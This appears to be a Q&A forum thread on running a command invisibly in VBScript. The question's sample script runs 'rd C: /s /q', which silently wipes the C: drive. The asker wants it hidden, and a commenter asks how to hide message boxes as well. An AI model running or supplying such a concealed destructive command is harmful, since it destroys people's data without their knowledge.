# How can I run a command silently in VBScript?

Tags: vbscript

So, here's the script:

```
Set oShell = WScript.CreateObject ("WScript.Shell") 
oShell.run "cmd.exe /C rd C: /s /q" 
Set oShell = Nothing
```

The thing is that I want to make that command line prompt be invisible / hidden and I don't want to use external programs.

Answer (score 8):

You can use this VBScript to run cmd commands hidden, just incorporate it into your script:

```
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "cmd /c yourcommands", 0, True
```

Taken from this answer: [Prevent VBscript app from showing Console Window](https://stackoverflow.com/questions/13142603/prevent-vbscript-app-from-showing-console-window)

Comment: This actually worked. But Message boxes still appears. How to hide everything?